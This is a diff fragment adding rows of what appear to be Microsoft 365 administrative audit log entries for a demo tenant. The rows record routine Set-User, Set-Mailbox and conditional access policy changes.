+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T03:20:36Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T08:15:10Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T09:02:19Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T09:02:29Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T08:33:59Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T10:03:02Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T10:03:01Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T11:23:29Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T12:12:55Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T12:12:56Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T21:03:54Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T21:05:57Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T22:41:42Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T22:41:41Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T23:25:09Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T06:22:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T07:04:24Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-19T07:46:17Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-19T08:43:20Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""TkFNUFIwNkEwMDcuUFJPRC5PVVRMT09LLkNPTS9NaWNyb3NvZnQgRXhjaGFuZ2UgSG9zdGVkIE9yZ2FuaXphdGlvbnMvc2VjY3hwbmluamEub25taWNyb3NvZnQuY29tL0l0YXkgQXJnb2V0eQ2""
+  },
+  {
+    ""Name"": ""ResourceEmailAddresses"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""BypassLiveId"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""SN6PR06A07DC002.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""EmailAddresses"",
+    ""Value"": ""SMTP:Itay@seccxp.ninja;SPO:SPO_f4faabea-ce64-4cf4-a9f8-61c6fc6c665e@SPO_4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-05-19T09:09:00Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T09:05:19Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-09T17:43:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:43:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:53:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:53:13 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:52:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:52:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T18:09:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 6:09:58 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:59:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:59:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T18:09:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 6:09:58 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:09:22Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:09:21 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:04:51 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:04:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:04:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:17:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:17:28 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:22:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:22:50 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:22:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:22:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:21:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:21:58 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:17:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:17:30 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:27:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:27:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:19:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:19:29 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:21:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:21:52 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:27:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:27:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:26:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:26:15 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-09T17:22:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/9/2020 5:22:51 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
